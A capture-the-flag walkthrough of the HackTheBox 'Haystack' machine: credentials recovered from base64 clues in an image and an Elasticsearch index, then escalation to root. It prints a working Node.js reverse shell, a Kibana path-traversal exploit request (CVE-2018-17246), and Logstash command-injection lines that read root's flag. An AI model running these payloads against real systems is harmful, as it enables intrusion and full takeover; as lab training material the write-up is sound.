Haystack from HackTheBox: A Walkthrough

Step one: run an Nmap scan against the host to discover the running services:

root@kali:~/Documents/haystack# nmap -A -oN scan 10.10.10.115
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-14 17:23 UTC
Nmap scan report for 10.10.10.115
Host is up (0.017s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
|   256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_  256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp   open  http    nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open  http    nginx 1.12.2
| http-methods: 
|_  Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (92%), Linux 3.10 - 4.11 (90%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   16.13 ms 10.10.12.1
2   17.06 ms ip-10-10-10-115.eu-west-2.compute.internal (10.10.10.115)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.78 seconds

From the output we can see that SSH is running on port 22 and an nginx web server is running on ports 80 and 9200. Browsing to the page on port 80, you are greeted with a large image of a needle in a haystack. I downloaded this image and ran `strings` against the file.

root@kali:~/Downloads/haystack# strings needle.jpg
O'bu
N{M3
:t6Q6
STW5
*Oo!;.o|?>
.n2FrZ
rrNMz
#=pMr
BN2I
,'*'
I$f2/<-iy
bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==

At the bottom of the strings output you can see a long string that appears to be base64 encoded.

root@kali:~/Downloads/haystack# echo 'bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==' | base64 -d
la aguja en el pajar es "clave"
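This spot-the-base64 step can be scripted. Below is a minimal, hedged sketch in Python of what `strings` plus eyeballing does: extract printable runs from raw bytes and keep the ones that look like base64. The sample bytes are a synthetic stand-in, not the real needle.jpg.

```python
import re

def printable_runs(data, minlen=4):
    # Like `strings`: pull runs of printable ASCII out of raw bytes.
    return [m.group().decode() for m in re.finditer(rb"[ -~]{%d,}" % minlen, data)]

def base64_like(s):
    # Long runs of the base64 alphabet, optionally padded with '='.
    return re.fullmatch(r"[A-Za-z0-9+/]{16,}={0,2}", s) is not None

# Synthetic stand-in for the JPEG bytes; the real file lives on the box.
data = b"\xff\xd8\xff\xe0junk\x00bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==\x00"
print([s for s in printable_runs(data) if base64_like(s)])
```

On a real image you would read the file with `open(path, "rb").read()` and expect a few false positives alongside any genuine payload.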

I then decided to browse to port 9200 at http://10.10.10.115:9200. It returned some JSON-formatted data indicating that it is hosting an Elasticsearch database:

{
  "name" : "iQEYHgS",
  "cluster_name" : "elasticsearch",
  "cluster_uuid" : "pjrX7V_gSFmJY-DxP4tCQg",
  "version" : {
    "number" : "6.4.2",
    "build_flavor" : "default",
    "build_type" : "rpm",
    "build_hash" : "04711c2",
    "build_date" : "2018-09-26T13:34:09.098244Z",
    "build_snapshot" : false,
    "lucene_version" : "7.4.0",
    "minimum_wire_compatibility_version" : "5.6.0",
    "minimum_index_compatibility_version" : "5.0.0"
  },
  "tagline" : "You Know, for Search"
}

I then browsed to http://10.10.10.115:9200/_aliases to see which indices are in use:

{
  ".kibana" : { "aliases" : { } },
  "bank" : { "aliases" : { } },
  "quotes" : { "aliases" : { } }
}

From the output we can see that there are three indices: .kibana, bank, and quotes.
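For reference, each index's documents can also be pulled with Elasticsearch's `_search` endpoint instead of browsing by hand. A hedged sketch of building such a request (the URL shape is standard Elasticsearch 6.x; nothing is actually sent here):

```python
import json

def build_search(host, index, term, size=1000):
    # GET <host>/<index>/_search?size=N with a query_string body
    # searches every field of every document in the index for the term.
    url = "http://%s/%s/_search?size=%d" % (host, index, size)
    body = json.dumps({"query": {"query_string": {"query": term}}})
    return url, body

url, body = build_search("10.10.10.115:9200", "quotes", "clave")
print(url)
print(body)
```

Sending this with curl (with a `Content-Type: application/json` header) would return only the matching documents rather than the whole index.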

Now, I did the next step in a very messy way; there is probably a cleaner approach. From the decoded base64 string in the image, I knew the word of interest was "clave" (Spanish for "key"). So I browsed through each index in turn, hit CTRL+F, and searched for the word clave. I got two hits in the quotes index, both with base64 strings appended:

{"quote" : "Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}
{"quote" : "Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg"}

I then decoded these strings using the same method as before.

root@kali:~/Downloads/haystack# echo 'cGFzczogc3BhbmlzaC5pcy5rZXk=' | base64 -d
pass: spanish.is.key
root@kali:~/Downloads/haystack# echo 'dXNlcjogc2VjdXJpdHkg' | base64 -d
user: security
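The same decoding is a one-liner in Python, which is handy if more documents need checking:

```python
import base64

# The two blobs recovered from the quotes index.
blobs = ["dXNlcjogc2VjdXJpdHkg", "cGFzczogc3BhbmlzaC5pcy5rZXk="]
decoded = [base64.b64decode(b).decode() for b in blobs]
for d in decoded:
    print(d)
# -> user: security
# -> pass: spanish.is.key
```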

So we now have login credentials, which give us SSH access to the machine. From the indices we saw that Kibana is most likely installed. After logging in over SSH, I checked out the Kibana config file to see how it was set up.

root@kali:~/Downloads/haystack# ssh [email protected]
[email protected]'s password: 
Last login: Tue Aug  6 15:52:37 2019 from 10.10.14.39
[security@haystack ~]$ cat /etc/kibana/kibana.yml 
# Kibana is served by a back end server. This setting specifies the port to use.
server.port: 5601

# Specifies the address to which the Kibana server will bind. IP addresses and host names are both valid values.
# The default is 'localhost', which usually means remote machines will not be able to connect.
# To allow connections from remote users, set this parameter to a non-loopback address.
server.host: "127.0.0.1"

We can see that it is running on port 5601, but it is bound to localhost only and is not remotely accessible. After some Googling, I found an LFI vulnerability in this version of Kibana (CVE-2018-17246) that can be used to escalate privileges.

The first step in this exploit is to upload a JavaScript shell that Kibana can execute. I hosted the following JavaScript file on my Kali machine with Python's SimpleHTTPServer. Of course, make sure the IP address is changed to match your OpenVPN IP.

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "172.18.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

I then used curl to download the file onto the haystack machine.

[security@haystack ~]$ cd /tmp
[security@haystack tmp]$  curl http://10.10.13.111:8000/test.js --output jim.js

The next step is to start a netcat listener on the Kali machine, which will receive the traffic from the reverse shell once it runs. As specified in the JavaScript file, this listener needs to run on port 1337.

root@kali:~/Downloads# nc -lvp 1337 
listening on [any] 1337 ...

Then, as described on the GitHub page for the LFI vulnerability, send a GET request to Kibana. I did this with curl. The request has to come from localhost, since Kibana is only accessible locally.

[security@haystack tmp]$ curl -X GET 'http://127.0.0.1:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../tmp/jim.js'

Checking back on the listener, we can see that a connection has been established. Typing ls successfully lists the current directory.

root@kali:~/Downloads# nc -lvp 1337
listening on [any] 1337 ...
10.10.10.111: inverse host lookup failed: Unknown host
connect to [10.10.13.111] from (UNKNOWN) [10.10.10.115] 56236
ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

I upgraded to a more user-friendly bash shell using Python. You can also see from whoami that we now have access to the machine as the kibana user:

python -c 'import pty; pty.spawn("/bin/bash")' 

bash-4.2$ whoami
whoami
kibana

Now we need to find a process that we can somehow abuse to escalate privileges to root. Running ps aux shows all running processes, and from this we can see that logstash is running as root.

[security@haystack ~]$ ps aux | grep logstash
root       6147 22.4  7.5 2658288 293184 ?      SNsl 16:18   0:33 /bin/java -Xms500m -Xmx500m -XX:+UseParNewGC -XX:+UseConcMarkSweepGC -XX:CMSInitiatingOccupancyFraction=75 -XX:+UseCMSInitiatingOccupancyOnly -Djava.awt.headless=true -Dfile.encoding=UTF-8 -Djruby.compile.invokedynamic=true -Djruby.jit.threshold=0 -XX:+HeapDumpOnOutOfMemoryError -Djava.security.egd=file:/dev/urandom -cp /usr/share/logstash/logstash-core/lib/jars/animal-sniffer-annotations-1.14.jar:/usr/share/logstash/logstash-core/lib/jars/commons-codec-1.11.jar:/usr/share/logstash/logstash-core/lib/jars/commons-compiler-3.0.8.jar:/usr/share/logstash/logstash-core/lib/jars/error_prone_annotations-2.0.18.jar:/usr/share/logstash/logstash-core/lib/jars/google-java-format-1.1.jar:/usr/share/logstash/logstash-core/lib/jars/gradle-license-report-0.7.1.jar:/usr/share/logstash/logstash-core/lib/jars/guava-22.0.jar:/usr/share/logstash/logstash-core/lib/jars/j2objc-annotations-1.1.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-annotations-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-core-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-databind-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-dataformat-cbor-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/janino-3.0.8.jar:/usr/share/logstash/logstash-core/lib/jars/jruby-complete-9.1.13.0.jar:/usr/share/logstash/logstash-core/lib/jars/jsr305-1.3.9.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-api-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-core-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-slf4j-impl-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/logstash-core.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.commands-3.6.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.contenttype-3.4.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.expressions-3.4.300.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.file
system-1.3.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.jobs-3.5.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.resources-3.7.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.runtime-3.7.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.app-1.3.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.common-3.6.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.preferences-3.4.1.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.registry-3.5.101.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.jdt.core-3.10.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.osgi-3.7.1.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.text-3.5.101.jar:/usr/share/logstash/logstash-core/lib/jars/slf4j-api-1.7.25.jar org.logstash.Logstash --path.settings /etc/logstash

I took a look at the logstash configuration:

bash-4.2$ cd /etc/logstash/conf.d/
bash-4.2$ ls
ls
filter.conf  input.conf  output.conf
bash-4.2$ cat output.conf
cat output.conf 
output {
  if [type] == "execute" {
    stdout {
      codec => json }
    exec {
      command => "%{comando} &"
    }
  }
}
bash-4.2$ cat input.conf 
cat input.conf 
input {
  file {
    path => "/opt/kibana/logstash_*"
    start_position => "beginning"
    sincedb_path => "/dev/null"
    stat_interval => "10 second"
    type => "execute"
    mode => "read"
  }
}
bash-4.2$ cat filter.conf 
cat filter.conf 
filter {
  if [type] == "execute" {
    grok {
      match => {
        "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
    }
  }
}
bash-4.2$

You can see that logstash is configured with three files: input, output, and filter.

input.conf shows that it collects data from /opt/kibana/logstash_*, checking every 10 seconds.

filter.conf then shows that the input is filtered for messages matching the pattern Ejecutar comando.

output.conf then shows that the command captured in the dynamic field comando gets executed.

With this information, we now know that we need to supply data in /opt/kibana/logstash_* that includes the command we want to run. That command will then be executed by logstash, which in turn runs as root.
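Taken together, the pipeline amounts to: read lines from the file, grok out `comando`, and hand it to `exec`. A hedged simulation in Python (GREEDYDATA approximated as `.*`; nothing is actually executed here):

```python
import re

# filter.conf's grok pattern, as a plain regex.
GROK = re.compile(r"Ejecutar\s*comando\s*:\s+(?P<comando>.*)")

def commands_from_log(lines):
    cmds = []
    for line in lines:
        m = GROK.search(line)
        if m:
            # output.conf would run: "%{comando} &"
            cmds.append(m.group("comando") + " &")
    return cmds

print(commands_from_log(["Ejecutar comando: id", "some other log line"]))
# -> ['id &']
```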

Logstash was new to me, and I wasn't sure of the exact format the log file needed for the command to be picked up by the filter. So I took a spray-and-pray approach and loaded a file with every plausible format, line by line, until one worked. The file can be seen here:

comando: cat /root/root.txt > /tmp/good
cat /root/root.txt > /tmp/good2
Ejecutar comando: cat /root/root.txt > /tmp/good3
GREEDYDATA:whoami > cat /root/root.txt > /tmp/good4
Ejecutar\s*comando\s*: cat /root/root.txt > /tmp/good5

I hosted this file on my Kali machine via Python's SimpleHTTPServer and downloaded it into the /opt/kibana directory on the haystack machine.

bash-4.2$ cd /opt/kibana/

curl 10.10.14.27:8000/logstash_i --output logstash_i
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   180  100   180    0     0   2964      0 --:--:-- --:--:-- --:--:--  2950

I waited the 10 seconds configured in input.conf for the file to be processed, then checked the /tmp directory to see whether my files had been created.

bash-4.2$ ls /tmp
good3

As you can see, the good3 file was written to /tmp. I did try recreating the logstash_i file with only the line that executed, but for some reason it didn't work. I'm still not 100% sure what the format should be; all I know is what worked for me, even if it's a bit messy. I then ran cat on the output file to view the flag and finish the box.

bash-4.2$ cat /tmp/good3
[REDACTED]
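In hindsight, the grok pattern explains the result: running the filter's regex over the five trial lines shows that only the `Ejecutar comando:` line is captured (assuming grok matches anywhere in the line, like `re.search`):

```python
import re

pattern = re.compile(r"Ejecutar\s*comando\s*:\s+(?P<comando>.*)")

trial = [
    "comando: cat /root/root.txt > /tmp/good",
    "cat /root/root.txt > /tmp/good2",
    "Ejecutar comando: cat /root/root.txt > /tmp/good3",
    "GREEDYDATA:whoami > cat /root/root.txt > /tmp/good4",
    r"Ejecutar\s*comando\s*: cat /root/root.txt > /tmp/good5",
]
print([n for n, line in enumerate(trial, 1) if pattern.search(line)])
# -> [3]
```

Line 1 lacks the literal word "Ejecutar", and line 5 contains the pattern's `\s*` metacharacters verbatim, so neither matches; only line 3 fits the pattern, which is why only good3 appeared.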


CTF team: Hunter Network Security
Site: bbs.kylzrv.com
Article: Xtrato
Layout: Hunter-Anonymous
